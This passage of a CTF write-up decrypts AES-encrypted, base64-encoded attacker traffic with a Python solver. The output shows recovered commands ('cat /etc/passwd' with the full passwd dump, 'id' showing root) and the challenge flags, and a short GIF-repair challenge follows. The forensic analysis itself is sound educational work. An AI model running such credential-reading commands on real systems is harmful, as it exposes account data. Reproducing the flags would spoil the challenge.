    "en86xzueybQbSZMv2HrnGXRUc4aZmJvhFVCALlrIE+Q468o3U1unvP+x38Rc3yJ2sTEDaEbYRFYToZqLXjolNtUdNvZjJMpmke0L1+P/ZQrj1vX4bvWrI+I03yfJ/DwAfQzBWQ1eiq6d1e6kbYwL/0qb9Fh9JdUyy6bm52bYImHa603MoerxYaj4/nyrUWIE+Js1o4tl2Mf7sNyT2ZZlDh9zkRz+NDVbl/vgsXhiQwxD+m9aFVmIYWfzT/yLtqJcPVtghaDU/H8L6r0jiDipvbEv7uBj4Q0ux0Y+NTlCvnW6h/tS25Vis1hiUeBRCibYI3+u46cSkjQp4IEtE6VYMXnXA8jdzHjy/w8JdTLEy38F5RPXaNIu1z5+HQdT1fD5Yo3ZQ4zRVIJDEUCInKJAxeF3IBiIjXmDp4U3xhZ5y/Xv0+plzIdkLyq3xWb/yQt/ymhyEXXTQl72nEOVuiIc+3oDLSj9sbVxDOmfUM81nvKkJaUhRkzxARNwP3qMInmPUFy+h7vDOF+2BzRrHvp1apqSH3XBKNhg6qC0xEp/u+7a68wsHpAMW1qzb4zil0BpOIWu3i0rmqVjw23WbbhscXFG50Webi7ikORBvacwqPW9YiM70U00m4dFbJI0SDgVC/+TvOG5Cb8FJmD3yglPlmM50fE6KiYe08VLxqL1vNNOrAbS8sjvYA1Bt8gwWzofxuQbi5By+11N/+osnMsnHQ0cNrS29FsRU2qb5k4gvgaGRFT6KONFrQHRCzg8nQJuF0wGL3e9aVa9mpI6K7JxE86PeKcKtbR6/PUYiNHhCuWxMQNoRthEVhOhmoteOiU2S0Ffxf67f0AuS3uRnc8IrwhaWDabye5Z7765YgELhbuSH5JzRR2b+hwPykNAJTKeXwYiqeFz8El64PhASUauh2GGvkzX0O1wdfjjEZihw7GumpHqI4ZYloh/fuAR0ARa36QzxTj3/D9a2sHjDt7E6kZ2G0PF8e3PXfyo1nbtFGy7XtqCXOB7N0ULzDaMBO6WG0IdY8KSam9EZYCezoIEKzRL0GswCYU/OUiLkfsSAuw7h3KZv00+wFqPmF1lV20drPGUmOUHVCuYbP5Y3sllLKROlGTlAQqitg1V7D2XkNl2p3NzIqzvtDG6F+8O0HnhvdpCnWIT6lRIDaV3xC2tjZb0S2J5y423MdV3oBNw9m0GY0dObzKAYzZ5VAgixqZBEahhnlm3NqTk3C7pJeJz4nTbXtyJjpGTillc6lPONUbUSX/1o6xuCv0selQDei5+CsMOCCzOLpJ7WPrp6BPraYJzHPCcdahpgVV4Ql4kuwJpk1UO0xh4VvdjoasYrRGA0MshIky/s4Lwy3aeWTK8hnczSuKALl1tfN2JEExM3DwlsK+b7wudEMmOeFmSbeA48hx0AciSg14+KYurTevwM41egdLlQ5q3jpFLUYVb8XOFGzEOl0Qo/fUc5dgB5sqnLrOR3GNYYvO8N9JL34A5ZXGAi6PBQ+pR64kcK+MRHWRbQ9skSs7YY7fNCX8ubkT3VQ+g+cxC6d4dS02A2A0Qd0L+X5jirW8+vwl2WwIgte31w77f2EAeKrl78AN5x6u/f5xYX0oQprNAzs7fAVOKv2huC8g5gEbgoSanT9brqCs=",
    "yUtoUeQN1TmbabEBeju/lQ==",
    "Ly2i9XAQZA0V4Va3u2vngTFR43WS8Hsp74PYelRgO1K7IBJP6iTdOFbReU/l0NOB9/N+bs50HiF4dJX1xRSgo7xJg7xmeMVvHYslVtjHhkJuGCJEnClJx0p2HefKhTXi0XUUpWdlDo7AsIjdcnB50W+K1niW36DYR0YF/Ww11AZP9GrM7yO0xPPmjjTAq2x2/wiCEDt6hRfm6NGOEw0tunIEdTIxZcbnlgzvQUeLwuBYglHPusykdhS1zu9KAnlsOnFZl7l2GpChyGx/5r5mYAF1EOPJ0eexPgPiDj2m/Gl4R2pmzaM2t1IcoLNwA+X3zkUsWw0WOnKInIOYuCxZLSrOg2+IgCycLkPGj1ygsVPC5Di9DFG3D8qd2fYX4YiHsR8Gb71kF92sfLcg2I8hgDUJfrtozg21TOffegrT8LIGMf+FvCa3VnCWARdlfpiJIHyFI5r1iOkJl9mIdlxfHOfBapZ3vZcT1RGlYH+7uMiD6jN+YeW2T873f8ppBwmWC6uwcU6EqfTykZq8uxbQa7n7H03s7PzH+NXgdNGFPOeAYk9pIcmvO19oFAeDsIElNot0xdJRjVJ7pv4ZRnZquwP6/354R1k+PAi4Imc/yw+7IBJP6iTdOFbReU/l0NOBGx8vzSfR6Xnqe5657uI2UwjPG7XgoinCNWDECQA0AiNuGCJEnClJx0p2HefKhTXi0XUUpWdlDo7AsIjdcnB50aTnc024xvjah1wXVBHAJoNtOineMjJlMXrIwWhWagLXBMSN1e/6sKZce3Vp1uSmbc9Imi1NuqxFiuM5fJsZ97vwChCNtL+khqat11mU4fROKmYVe+nRVrysSLTeepHp2kV7JYspVRSPTfZ6t5wOcJGf8BztdoGvIrnMNwa/uMUMqCU02Heeb37K9LhBPVlbtJ44BAWkQ7osyQSVS3WJj0EBdRDjydHnsT4D4g49pvxp9yBwByx0znWfkXHLMLOzZkpylQppEUC99Vw5VSh6L9YdcBABPdOuxEjGJkWhbuNlwuQ4vQxRtw/Kndn2F+GIhxS0kUENYGURa9pP5VCGwe3UY/Jyx/jA1tgLkCrXVZeRmCaFXOMQM9SH/p9eLaUyR7vLtsBvh+91al3dUWGK9C8Y9x+yq2eYdSk8V1ALYOP4mkUvyi5Dckz8yYVwqJoyZLGl37C/LCzUQRoRJlFvq1CsBsnFqyfYur4mtyOYu3meadM8s0/GTRty8TAjQS1djtWjJdfEfcTgLkWnMVMUX+B0lmuz4frvz6ya+1o5b5R2VBnZ4APjg+AwEvAn0Ti7dxFZLiC290t97xvfkGSGGxe7K2YnDMd1iKZjtdmUlRUdG7Pv6pNZMULNSPsL9GAsUxB5Lh6CuXkonlGBa1A0KbGdl2QO81cQkRdaeVpp3pFo0fv8NTsYtN5ctxSZDmeXliK6vEaeymbfa4lqfNnkUwr5kOiscA0a0+t1AlshI7RiagX4SmcQ0EziH+fsjf/9+Z44BAWkQ7osyQSVS3WJj0EBdRDjydHnsT4D4g49pvxp9yBwByx0znWfkXHLMLOzZng+txjuwK8dNIS0WUy/5XHz1HIxRCYZTDykSo7ZiMq9wuQ4vQxRtw/Kndn2F+GIhxS0kUENYGURa9pP5VCGwe34wIP5JDrX0lO03lzQ7iPu",
    "r8uCyuorIBZ50N4h2gP2EB5T2MLkkWOettjNwA41K0t5DLFagfNzQ3IAR4db0F3a8IcuKNL12/Sqkv8bz75n5A==",
    "so24GI7XNuUvhmLeYq36D9EuMFYlrcc1pFzYhFb+9Krb3ekzdX0YDu2injt2e6NMVQTEGmecNteWtFB+rLIHpg==",
    "4TgFjZ+LpXEKEWm3Gn7o6Q==",
    "9CUTfxN+OvAl0QEo3YB6+Ebxyop4VelaxCK7DOymaTikGnVpzpNkqHiLiL7bupX6jVbSG4/EGW+HtqGVaZI2TbwtJYqr99BfGxaZ3xAeLocjhgtLq6N+UhxDAf7M1UOvAnGYG2zDAgFtWo1uBcwFPaoSvrXp+Jar8cWyWPrFgtgU4wvHhoZjSlauRsfJE28H"
]

# Function to decode Base64 and decrypt AES
def decode_and_decrypt(encoded_strings, key):
    cipher = AES.new(key, AES.MODE_ECB)
    for encoded in encoded_strings:
        # Decode Base64
        decoded_data = b64decode(encoded)
        
        # Decrypt AES
        decrypted_data = cipher.decrypt(decoded_data)
        
        # Print result
        print(decrypted_data.decode(errors="ignore").strip())

# Run the function
decode_and_decrypt(encoded_strings, key)

Here is the resulting output:

 $ python solver2.py 
cat /etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin

ls -alt
total 64
drwxrwxrwt    1 root     root          4096 Jan  8 19:03 tmp
drwxr-xr-x    1 root     root          4096 Jan  8 18:55 .
drwxr-xr-x    1 root     root          4096 Jan  8 18:55 ..
drwxr-xr-x    5 root     root           340 Jan  8 18:55 dev
dr-xr-xr-x  209 root     root             0 Jan  8 18:55 proc
dr-xr-xr-x   13 root     root             0 Jan  8 18:55 sys
-rwxr-xr-x    1 root     root             0 Jan  8 18:55 .dockerenv
drwxr-xr-x    1 root     root          4096 Jan  8 18:55 etc
drwxr-xr-x    1 root     root          4096 Feb 24  2022 app
drwxr-xr-x    1 root     root          4096 Dec 21  2018 lib
drwxr-xr-x    1 root     root          4096 Dec 21  2018 usr
drwxr-xr-x    2 root     root          4096 Dec 20  2018 bin
drwxr-xr-x    2 root     root          4096 Dec 20  2018 home
drwxr-xr-x    5 root     root          4096 Dec 20  2018 media
drwxr-xr-x    2 root     root          4096 Dec 20  2018 mnt
drwx------    2 root     root          4096 Dec 20  2018 root
drwxr-xr-x    2 root     root          4096 Dec 20  2018 run
drwxr-xr-x    2 root     root          4096 Dec 20  2018 sbin
drwxr-xr-x    2 root     root          4096 Dec 20  2018 srv
drwxr-xr-x    1 root     root          4096 Dec 20  2018 var
printf "CJ{w0w_u_are_4_certified_intrusion_analyst_exp3rt!1!}"
"CJ{w0w_u_are_4_certified_intrusion_analyst_exp3rt!1!}"

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

FLAG: CJ{w0w_u_are_4_certified_intrusion_analyst_exp3rt!1!}

Greyscale

Desc: A threat actor hides a secret message on this intentionally-broken GIF.

Given the broken GIF file.

While searching online, I came across an article detailing the GIF file format. Noticing that the First Data Block matched the one described in the article, I simply copied and pasted the hex data into the corrupted GIF file to repair it.

FLAG: CJ{_s0_15_it_pr0nounc3d_GIF_or_JIF?_}

PreviousITSEC CTF 2025 Writeup

Last updated 4 months ago